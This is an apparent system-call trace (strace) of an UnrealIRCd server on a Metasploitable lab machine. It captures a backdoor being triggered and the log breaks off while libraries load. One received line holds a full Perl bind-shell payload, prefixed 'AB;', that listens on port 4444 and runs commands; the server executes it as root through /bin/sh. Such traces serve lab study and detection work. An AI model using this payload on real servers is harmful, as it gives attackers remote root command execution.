4519  07:08:16.919344 select(1024, [2 3 4 5 6 7 9], [], NULL, {0, 430000}) = 1 (in [2], left {0, 290000})

4519  07:08:17.064099 clock_gettime(CLOCK_MONOTONIC, {906, 881121356}) = 0

4519  07:08:17.064121 time(NULL)        = 1495624097

4519  07:08:17.064132 time(NULL)        = 1495624097

4519  07:08:17.064145 gettimeofday({1495624097, 64149}, NULL) = 0

4519  07:08:17.064157 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:08:17.064196 clock_gettime(CLOCK_MONOTONIC, {906, 881209171}) = 0

4519  07:08:17.064207 gettimeofday({1495624097, 64210}, NULL) = 0

4519  07:08:17.064217 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:08:17.064363 clock_gettime(CLOCK_MONOTONIC, {906, 881377166}) = 0

4519  07:08:17.064390 accept(2, 0, NULL) = 8

4519  07:08:17.064410 getpeername(8, {sa_family=AF_INET, sin_port=htons(37995), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:08:17.064441 fcntl64(8, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:08:17.064508 fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:08:17.064539 setsockopt(8, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:08:17.064554 setsockopt(8, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:08:17.064565 setsockopt(8, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:08:17.064576 getsockopt(8, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:08:17.064590 setsockopt(8, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:08:17.064608 clock_gettime(CLOCK_MONOTONIC, {906, 881621272}) = 0

4519  07:08:17.064620 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 10

4519  07:08:17.064632 fcntl64(10, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:08:17.064641 fcntl64(10, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:08:17.064651 fcntl64(10, F_SETFD, FD_CLOEXEC) = 0

4519  07:08:17.064661 connect(10, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:08:17.064677 send(10, "v\311\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:08:17.064749 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:08:17.064786 gettimeofday({1495624097, 64790}, NULL) = 0

4519  07:08:17.064798 select(1024, [2 3 4 5 6 7 9 10], [], NULL, {1, 0}) = 1 (in [10], left {0, 990000})

4519  07:08:17.071310 clock_gettime(CLOCK_MONOTONIC, {906, 888344569}) = 0

4519  07:08:17.071366 recvfrom(10, "v\311\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\v\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:08:17.071436 close(10)         = 0

4519  07:08:17.071486 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:08:17.071504 send(8, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:08:17.071674 time(NULL)        = 1495624097

4519  07:08:17.071719 time(NULL)        = 1495624097

4519  07:08:17.071733 gettimeofday({1495624097, 71738}, NULL) = 0

4519  07:08:17.071748 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:08:17.071799 clock_gettime(CLOCK_MONOTONIC, {906, 888833705}) = 0

4519  07:08:17.071850 gettimeofday({1495624097, 71898}, NULL) = 0

4519  07:08:17.071928 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 370000})

4519  07:08:17.697055 clock_gettime(CLOCK_MONOTONIC, {907, 514064170}) = 0

4519  07:08:17.697055 recv(4, "PRIVMSG  #testit Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 54

4519  07:08:17.697055 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697068 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697083 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697098 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697111 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697134 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697148 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697162 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697176 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697189 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697203 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697217 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697230 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697244 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697257 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697270 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697318 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697339 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697371 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697394 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697415 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697437 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:17.697458 gettimeofday({1495624097, 697462}, NULL) = 0

4519  07:08:17.697470 select(1024, [2 3 4 5 6 7 8 9], [6], NULL, {1, 0}) = 2 (in [8], out [6], left {1, 0})

4519  07:08:17.697522 clock_gettime(CLOCK_MONOTONIC, {907, 514535157}) = 0

4519  07:08:17.697534 send(6, ":bot1!bot1@Test-CAD1B1ED PRIVMSG #testit :Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\r\n", 80, 0) = 80

4519  07:08:17.697569 recv(8, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:08:17.697598 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:08:17.697617 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:08:17.697629 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:08:17.697644 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5247

5247  07:08:17.697726 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5247  07:08:17.697741 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5247  07:08:17.697752 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5247  07:08:17.697766 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5247  07:08:17.697923 brk(0)            = 0x80f9000

5247  07:08:17.697948 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.697964 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef7000

5247  07:08:17.697981 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.697999 open("/etc/ld.so.cache", O_RDONLY) = 1

5247  07:08:17.698012 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5247  07:08:17.698031 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7eef000

5247  07:08:17.698041 close(1)          = 0

5247  07:08:17.698052 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.698068 open("/lib/libncurses.so.5", O_RDONLY) = 1

5247  07:08:17.698081 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5247  07:08:17.698180 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5247  07:08:17.698199 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ebf000

5247  07:08:17.698211 mmap2(0xb7eec000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7eec000

5247  07:08:17.698228 close(1)          = 0

5247  07:08:17.698240 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.698254 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5247  07:08:17.698268 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5247  07:08:17.698404 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5247  07:08:17.698422 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ebb000

5247  07:08:17.698434 mmap2(0xb7ebd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ebd000

5247  07:08:17.698451 close(1)          = 0

5247  07:08:17.698462 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.698476 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5247  07:08:17.698490 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5247  07:08:17.698582 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5247  07:08:17.698599 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eba000

5247  07:08:17.698613 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6b000

5247  07:08:17.698623 mmap2(0xb7eb4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eb4000

5247  07:08:17.698638 mmap2(0xb7eb7000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eb7000

5247  07:08:17.698652 close(1)          = 0

5247  07:08:17.698675 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d6a000

5247  07:08:17.698687 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d6a6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5247  07:08:17.698743 mprotect(0xb7eb4000, 4096, PROT_READ) = 0

5247  07:08:17.698808 munmap(0xb7eef000, 29913) = 0

5247  07:08:17.698852 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5247  07:08:17.698867 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5247  07:08:17.698888 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd6af20) = -1 ENOTTY (Inappropriate ioctl for device)

5247  07:08:17.698934 brk(0)            = 0x80f9000

5247  07:08:17.698943 brk(0x80fa000)    = 0x80fa000

5247  07:08:17.698955 brk(0x80fb000)    = 0x80fb000

5247  07:08:17.698971 getuid32()        = 0

5247  07:08:17.698981 getgid32()        = 0

5247  07:08:17.698990 geteuid32()       = 0

5247  07:08:17.698998 getegid32()       = 0

5247  07:08:17.699012 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5247  07:08:17.699025 time(NULL)        = 1495624097

5247  07:08:17.699038 brk(0x80fc000)    = 0x80fc000

5247  07:08:17.699052 brk(0x80fd000)    = 0x80fd000

5247  07:08:17.699071 open("/proc/meminfo", O_RDONLY) = 1

5247  07:08:17.699093 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5247  07:08:17.699111 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000

5247  07:08:17.699123 read(1, "MemTotal:      1035240 kB\nMemFree:        659808 kB\nBuffers:         63072 kB\nCached:         157540 kB\nSwapCached:          0 kB\nActive:         251484 kB\nInactive:        98052 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        659568 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4804 kB\nWriteback:           0 kB\nAnonPages:      128988 kB\nMapped:          52008 kB\nSlab:            14572 kB\nSReclaimable:     6700 kB\nSUnreclaim:       7872 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5247  07:08:17.699209 close(1)          = 0

5247  07:08:17.699220 munmap(0xb7ef6000, 4096) = 0

5247  07:08:17.699232 brk(0x80fe000)    = 0x80fe000

5247  07:08:17.699258 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5247  07:08:17.699272 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5247  07:08:17.699330 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5247  07:08:17.699343 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5247  07:08:17.699356 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5247  07:08:17.699368 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5247  07:08:17.699382 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5247  07:08:17.699394 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5247  07:08:17.699426 uname({sys="Linux", node="metasploitable", ...}) = 0

5247  07:08:17.699494 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5247  07:08:17.699513 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5247  07:08:17.699546 brk(0x8100000)    = 0x8100000

5247  07:08:17.699557 getcwd("/etc/unreal", 4096) = 12

5247  07:08:17.699572 getpid()          = 5247

5247  07:08:17.699588 getppid()         = 4519

5247  07:08:17.699604 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5247  07:08:17.699623 stat64("/sbin/sh", 0xbfd6aef8) = -1 ENOENT (No such file or directory)

5247  07:08:17.699636 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5247  07:08:17.699653 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5247  07:08:17.699677 socket(PF_FILE, SOCK_STREAM, 0) = 1

5247  07:08:17.699691 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5247  07:08:17.699703 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5247  07:08:17.699725 close(1)          = 0

5247  07:08:17.699737 socket(PF_FILE, SOCK_STREAM, 0) = 1

5247  07:08:17.699747 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5247  07:08:17.699757 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5247  07:08:17.699806 close(1)          = 0

5247  07:08:17.699821 open("/etc/nsswitch.conf", O_RDONLY) = 1

5247  07:08:17.699850 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5247  07:08:17.699867 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000

5247  07:08:17.699879 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5247  07:08:17.699928 read(1, "", 4096) = 0

5247  07:08:17.699937 close(1)          = 0

5247  07:08:17.699947 munmap(0xb7ef6000, 4096) = 0

5247  07:08:17.699963 open("/etc/ld.so.cache", O_RDONLY) = 1

5247  07:08:17.699975 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5247  07:08:17.699991 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7eef000

5247  07:08:17.700002 close(1)          = 0

5247  07:08:17.700012 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.700027 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5247  07:08:17.700042 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5247  07:08:17.700131 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5247  07:08:17.700149 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d61000

5247  07:08:17.700164 mmap2(0xb7d68000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d68000

5247  07:08:17.700181 close(1)          = 0

5247  07:08:17.700193 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5247  07:08:17.700206 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5247  07:08:17.700220 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 